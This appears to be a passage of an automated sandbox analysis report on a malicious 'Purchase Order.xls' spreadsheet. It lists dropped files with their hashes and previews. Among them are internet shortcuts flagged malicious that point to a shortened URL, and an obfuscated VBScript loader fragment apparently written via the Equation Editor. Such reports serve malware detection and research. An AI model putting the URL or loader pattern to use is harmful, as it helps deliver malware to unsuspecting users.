      Preview:......9.3.4.7.1.2.1.2.5.=.].?.?.?.4.`.;.^.?.*.!.4.4.8...;.9.%.(.<...6.?.$.....;.0.5.>...4.,.0.?.3.*.$.<./.?.%.<.9.].).1.[.`.-.'.?.-.~.;.`.4.%...@.?.?.;.%.5...,.#.?.).,.%.*.?.9.1.).7.*.8.+.4.7.?.!.>.-._.?.....6.1.%.3.=.0._.!.~.3.*.5.*.[.<...*.?.].&.2.(.3.5.7.%.?.?.^.?.7.>.(.;.?.[.!.8.[._.^.$.[.3.(.+.?.].<.?.2.`.>.6.5.4.[.~.:.6.-./.7...4.$.^.....#.?.1.0.&.`.:.).`.8.?.5...1.-._.|.1.&.).6.>.%.:.@.3.?...!.?.#.[...?.1.9.[.~.?.1.4.'.3.6.%.3.0.9.&.?.&.$.;.<.2.).(.)...~.=.+.?.?.%.'.9...<.0.-.%.3.?.2.|.8.;.0.:.%._.&.7.?.&.(.'.+.[.9.@.1.=.,.~.)...9.#.|.:.0...1.1.6.%.=._.'.1.:.=...%.?.*.-.`.).0.<.8...&...?.1.].=.=.!.:.4._.?.*.|.:.*.,.,.%.@.$.#./.5.]...,.4.`.].|.6.!.0.).`.`.@.$.?._.%.`.#.5.@.8.!.*.|.(.*.).~.2.].).;._.^.^.,.%.=.+.-.+.>.'.(.$.].$.%.%.`.?.=.]...%.~.>.$.7...(.).;.7.+.=.$.:.*...,.>.5.#.,.'.=.(.`.!.;.;.3.%.?.7.*.).?.@.../.$.?.;.;.?.).4.*.,.?.,.5.-.~.3.?.;.2.~.(.?.@.4.@.?.^.1.7.>.?.&._.~.?.^.*.'.-.?...#.%.*.<.[.9.7.@.?.&.7.-.=.:.8...8.).&.^.%.!._.!.~.^.8.).|.%.<.`...3.%.=.!.#.:.;.1.&.#.8.
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:very short file (no magic)
      Category:dropped
      Size (bytes):1
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3:U:U
      MD5:C4CA4238A0B923820DCC509A6F75849B
      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
      Malicious:false
      Preview:1
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:very short file (no magic)
      Category:dropped
      Size (bytes):1
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3:U:U
      MD5:C4CA4238A0B923820DCC509A6F75849B
      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
      Malicious:false
      Preview:1
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 498x1080, components 3
      Category:dropped
      Size (bytes):29468
      Entropy (8bit):7.75438130409642
      Encrypted:false
      SSDEEP:384:rZhaPKVJZiDgSaUNxR/cSrbB3PB142ArB8wVH/aeAO/aKLJdRWfSDZ:NVJZiDZrNxRcSrbB3PJArrfWO/ttdRIg
      MD5:CD61E82FF399A5AC438529B27A35046F
      SHA1:025577E1928A9FFFFD25CBE6DCAF549DD1F9268C
      SHA-256:E8D56D15DA2AF1C68DE2ED0D5E0B22FF71A689451CC320E75309C0A0DC5AAE8F
      SHA-512:5D29E760CA0BC4EFB1AFDC7AA7B3EF6119E30DB7288D09167F9121981BDD404E9EBD14853B03054EA0BC559E8EB9FED7D15F936503073CE427CB54E8AB775EFA
      Malicious:false
      Preview:......JFIF...................................."....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............................"....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............8...."..........1...............................................................>......|}..............$#}..._l...|Z.V.......I%..~.1..P.KNH..............9...Y..I/dLO._....Af8H..........................................................i.3Z...<.."*4.2....Ee.a.8......v..ew..p...........sE..E..._..M.r...d}5._M._..........>...<........................................................................................................................................................................................................................................................................................................................................................Z.p.G.n....`.N....~.c...n.}....(.W~_,.k..w.<..!...;..G..7.7XCu.t...............N.B.#])1-W..h..1>.X...OM.XLm_;p...1...0..%....Bz.5.|..:..r..............\.p...z
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):26
      Entropy (8bit):3.95006375643621
      Encrypted:false
      SSDEEP:3:gAWY3n:qY3n
      MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
      SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
      SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
      SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
      Malicious:false
      Preview:[ZoneTransfer]..ZoneId=3..
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.02554401976717185
      Encrypted:false
      SSDEEP:6:I3DPcvzspvxggLRvL/Kg7jnpRXv//4tfnRujlw//+GtluJ/eRuj:I3DPHlDLygXHvYg3J/
      MD5:ED1ADECCFEEB3448292A6FCA686BDEC5
      SHA1:83FF56A40C51250A7327A4E0DEF98E0DF48806DC
      SHA-256:C854A94868672E22D98E803316631DF574BBB578E02E57DD8BDF5AEB4D67F80D
      SHA-512:8D61750C158F7B55E9AD7476421A3857F7CBC372491CBA924C63B8534101663C293C9CE98B87239A109D60607CD68BCC543D8E6F699818C46BA2A4645E694712
      Malicious:false
      Preview:......M.eFy...z.`...dSO........S,...X.F...Fa.q............................x..$!..E..S0............@.,..}L.Pq^........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.025510077899887827
      Encrypted:false
      SSDEEP:6:I3DPcTUKeRvxggLRTUxo6sv57pltRXv//4tfnRujlw//+GtluJ/eRuj:I3DPl/UxLa57XvYg3J/
      MD5:A147871792B6C37308E465B9306B19C6
      SHA1:6F50B31359BA74E1C22919EA807BB472B7CAA393
      SHA-256:E4D5EB9869E3CBF31F65B2E46935292BB9D650A829FE7E4A11D5AD34A624B6D6
      SHA-512:00575DD2648C18AA5946AF2B69B40150C3E7077905D3E23635578D4BC993ABD73D6CBA73D985CEB3DB455DF0AFF77C116B3D9A36CA1AB9AF33AD1C691A276BA5
      Malicious:false
      Preview:......M.eFy...zY#y.:..L.......^S,...X.F...Fa.q................................b.`L...sH.c............V.b|D.u.I.eJ.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):716800
      Entropy (8bit):7.919649175449751
      Encrypted:false
      SSDEEP:12288:I0nYCfghpozwjTNYm0nWOB665d4xoTW0wYL6m7fYjZ6BC+lYTbLozdzEOP6OWYml:RYCfgQWh4H6ud4cW0w46mDYdYC+lY3LX
      MD5:14F8E71EFE3CE9CD50018FBE473C479B
      SHA1:866624470D5F4C63C8D7E222720C2BE7896E27CF
      SHA-256:34DD8DF70BFE4D80794929D4D5A6CA9C82984F2B8A4D32E3AEA657EF9B5ACC6B
      SHA-512:1BE9D3E5F503CB483D1DF614556E46E0C415A40946DE7DC24690B9DD24EFB015128B9896B0BF51C15DDCD2D4407C28B7EDEF25ED592E720CC3E31B83DE343132
      Malicious:false
      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Composite Document File V2 Document, Cannot read section info
      Category:dropped
      Size (bytes):712192
      Entropy (8bit):7.9484375617444725
      Encrypted:false
      SSDEEP:12288:h0nYCfghpozwjTNYm0nWOB665d4xoTW0wYL6m7fYjZ6BC+lYTbLozdzEOP6OWY:yYCfgQWh4H6ud4cW0w46mDYdYC+lY3Ll
      MD5:9C4D09641D01B751161DA2A297BB1335
      SHA1:62A95F97E73BB1F7B821EB3DCC0EACD85C360DE5
      SHA-256:30C3B23491C7BBC83EF1BEA1744393B16B1770B7674539654E3D1BC164AAA160
      SHA-512:33774AAC24B90040A26C181CF4934BF119FEC3597CACC37CEE3930D7C5736E85215012379CDB1AF6863F29E511905443A6A42BAD50B6863AB73163633979050C
      Malicious:false
      Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:MS Windows 95 Internet shortcut text (URL=<http://tny.wtf/EvwK>), ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):45
      Entropy (8bit):4.480524762900188
      Encrypted:false
      SSDEEP:3:HRAbABGQYm/3LcmWgTqv:HRYFVm/3LOBv
      MD5:1A6F97207CB8B1C797FF36D32E653DAF
      SHA1:CC0AD45F6599B416C520072E83DEF18FD1D74D4E
      SHA-256:27AA7D890DC280F90179990925A8C5E44011234F440FA06F881348D356AD4269
      SHA-512:E8B14870ADF358BE781E84B90E892F522FCA183812216D1CAFF7684B09D65091C880C22228FEC7CB12587C43AF0879353000E3F1F07927502F745B5E6E8089B4
      Malicious:true
      Preview:[InternetShortcut]..URL=http://tny.wtf/EvwK..
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:Generic INItialization configuration [xls]
      Category:modified
      Size (bytes):89
      Entropy (8bit):4.697329712148024
      Encrypted:false
      SSDEEP:3:bDbiIcLOQ2K4q8FomM/N4q8Fov:bHihD2NJ6KJy
      MD5:0BC76B197BC1F8C869805598680D2CD9
      SHA1:81E9419F416A8D016D87AD527F10769458777313
      SHA-256:E4A8D9A626389AAFBCE2002F8B34ECAB9D316CC70AA0A9B15EE6EC03D787555B
      SHA-512:051B2F587A1B684FFC754D23DCF8007F3F931B2ADE33104CE1BECA5DEA9CFC60BC9381D550AF3AD5D43CB301F9DC1D66692131330BD4169E5DBE24A25E296B7E
      Malicious:false
      Preview:[folders]..EvwK.url=0..tny.wtf.url=0..Purchase Order.LNK=0..[xls]..Purchase Order.LNK=0..
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:MS Windows 95 Internet shortcut text (URL=<http://tny.wtf/>), ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):41
      Entropy (8bit):4.2963379801223045
      Encrypted:false
      SSDEEP:3:HRAbABGQYm/3LcmWy:HRYFVm/3LOy
      MD5:D591A53347F94FBC48B4B6A5CCE920ED
      SHA1:C00082566F3211F9B1BBEC933A8AE164759C290A
      SHA-256:1CA93696A94797C9411318830CAC6A5B26FEACC37D5CAA4B3742D722CD073781
      SHA-512:BA14258049ABCC3E31AA3DFC3ABBC2949AF30BB73B031C0E408BCF036B51B7AC11E32C3B39A7952E1A007179720C970B29CB2DF8EF03A021EF3B59FEB5AE177E
      Malicious:true
      Preview:[InternetShortcut]..URL=http://tny.wtf/..
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.503835550707525
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVypil69oycWjUbtFJlln:vdsCkWtTl69oyjUvl
      MD5:CB3D0F9D3F7204AF5670A294AB575B37
      SHA1:5E792DFBAD5EDA9305FCF8F671F385130BB967D8
      SHA-256:45968B9F50A9B4183FBF4987A106AB52EB3EF3279B2118F9AB01BA837DC3968A
      SHA-512:BD116CAF3ACA40A5B90168A022C84923DB51630FA0E62E46020B71B8EB9613EAE776D476B0C6DE0D5F15642A74ED857765150F406937FBA5CB995E9FCDAC81AE
      Malicious:false
      Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):421468
      Entropy (8bit):3.570272506767291
      Encrypted:false
      SSDEEP:3072:KHG9wf2YF/hNe4VTdRnTT8w4TWU7qtg/gl7p+lH1dS7tGd0LoJS7Et3Z+vYH:hwf2YFK7qi
      MD5:A7134156DC3A01AC743ED671C6FCE261
      SHA1:462834C8EAC709F4F6AE14DC8E88F8238B08CBE5
      SHA-256:96EBA88A40E1B29630E4D0CD374F3FE9B45EE1AD2F86821E824BF97D821A5CAE
      SHA-512:E473905BABF5515B8138AB83DA6946DFB7970C83FECD681659D3DD7A10CF0A7380FAB1C01D9C3931BAB0ECD25CDE09BC9B2D94BA1BFB4C21330DBD25EFD1545B
      Malicious:true
      Preview:..d.i.m. .t.h.e.r.m.i.a.t.r.i.a.E.E. .....t.h.e.r.m.i.a.t.r.i.a.E. .=. .p.a.g.o.d.e.i.r.o.........t.r.i.e.n.n.a.d.o.(.".L._.H.e.l.p.A.l.i.a.s._.0.0.1._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".L._.H.e.l.p.A.l.i.a.s._.0.0.2._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".L._.H.e.l.p.A.l.i.a.s._.0.0.3._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.4._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.5._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.6._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.7._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.8._.0._.M.e.s.s.a.g.e.".).
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Jul 30 17:28:26 2024, Security: 1
      Category:dropped
      Size (bytes):1478144
      Entropy (8bit):7.987558322129612
      Encrypted:false
      SSDEEP:24576:iYCfgQWh4H6ud4cW0w46mDYdYC+lY3LozdzEOP6TfSH9SOAB3VDmRAsSEZZ1v/rm:iY/N4H8cYXmDYdYBWc5zEOC/lkAbCrvS
      MD5:7541AB4663B63E507EC3BB95FC756421
      SHA1:4828635B49741B6093157A6AEB2F8C6B807C8321
      SHA-256:D329A94008BA2D4CD5B8BD92E008C363EFE23968BAA63DC4AFF94113450DC689
      SHA-512:E7E575168AF5AAC215235B8EF18D8FE2DF88120CFC4CDAB1DA459EAE539A7B35842E023B723D3ED11AF98B86495C25A75E69AEE0902D762F6D1C3A1D76F15894
      Malicious:false
      Preview:......................>...................................\...........................................................~...............b.......d.......f.......h.......................................................................................................................................................................................................................................................................................................................................................................E................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):26
      Entropy (8bit):3.95006375643621
      Encrypted:false
      SSDEEP:3:ggPYV:rPYV
      MD5:187F488E27DB4AF347237FE461A079AD
      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
      Malicious:false
      Preview:[ZoneTransfer]....ZoneId=0
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Jul 30 17:28:26 2024, Security: 1
      Category:dropped
      Size (bytes):1478144
      Entropy (8bit):7.987558322129612
      Encrypted:false
      SSDEEP:24576:iYCfgQWh4H6ud4cW0w46mDYdYC+lY3LozdzEOP6TfSH9SOAB3VDmRAsSEZZ1v/rm:iY/N4H8cYXmDYdYBWc5zEOC/lkAbCrvS
      MD5:7541AB4663B63E507EC3BB95FC756421
      SHA1:4828635B49741B6093157A6AEB2F8C6B807C8321
      SHA-256:D329A94008BA2D4CD5B8BD92E008C363EFE23968BAA63DC4AFF94113450DC689
      SHA-512:E7E575168AF5AAC215235B8EF18D8FE2DF88120CFC4CDAB1DA459EAE539A7B35842E023B723D3ED11AF98B86495C25A75E69AEE0902D762F6D1C3A1D76F15894
      Malicious:true
      Preview:......................>...................................\...........................................................~...............b.......d.......f.......h.......................................................................................................................................................................................................................................................................................................................................................................E................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Jul 29 07:01:49 2024, Security: 1
      Entropy (8bit):7.982273094460526
      TrID:
      • Microsoft Excel sheet (30009/1) 47.99%
      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
      File name:Purchase Order.xls
      File size:1'356'800 bytes
      MD5:687e2dbe29881473305307b385e83aa6
      SHA1:19fb4e457a0d672b337941d0c1b4f74dd80d382e
      SHA256:b5c3cb22b04a481fa8052965bda8161c48bd9536b0815c1a362555ad5156d336
      SHA512:5005cffefebf05259276d6dedbda5a86c4f65b2d579501709904820c6582fc045d1fa8deced5dba3767a0606434b5b60274ce2b90e6c2c6981914d48bdf6286a
      SSDEEP:24576:g6ud4cW0w46mDYdYC+lY3LozdzEOP6sCfg+WiCq+VegfNVnwWSKweHmhxOe:g8cYXmDYdYBWc5zEOCs/HqJgfHnwWBwb
      TLSH:3B55231DB9874702C44B20B14EE6C0BAED6D9C19A78C861776ADF72E3839734C2E765C
      File Content Preview:........................>.......................................................................................................h.......j.......l.......n......................................................................................................
      Icon Hash:276ea3a6a6b7bfbf
      Document Type:OLE
      Number of OLE Files:1
      Has Summary Info:
      Application Name:Microsoft Excel
      Encrypted Document:True
      Contains Word Document Stream:False
      Contains Workbook/Book Stream:True
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:False
      Flash Objects Count:0
      Contains VBA Macros:True
      Code Page:1252
      Author:
      Last Saved By:
      Create Time:2006-09-16 00:00:00
      Last Saved Time:2024-07-29 06:01:49
      Creating Application:Microsoft Excel
      Security:1
      Document Code Page:1252
      Thumbnail Scaling Desired:False
      Contains Dirty Links:False
      Shared Document:False
      Changed Hyperlinks:False
      Application Version:786432
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
      VBA File Name:Sheet1.cls
      Stream Size:977
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 12 e8 e7 c8 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Attribute VB_Name = "Sheet1"
      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = True
      

      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
      VBA File Name:Sheet2.cls
      Stream Size:977
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 12 e8 bf da 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Attribute VB_Name = "Sheet2"
      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = True
      

      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
      VBA File Name:Sheet3.cls
      Stream Size:977
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . V . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 12 e8 56 f8 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Attribute VB_Name = "Sheet3"
      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = True
      

      General
      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
      VBA File Name:ThisWorkbook.cls
      Stream Size:985
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 12 e8 90 a2 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Attribute VB_Name = "ThisWorkbook"
      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = True
      

      General
      Stream Path:\x1CompObj
      CLSID:
      File Type:data
      Stream Size:114
      Entropy:4.25248375192737
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
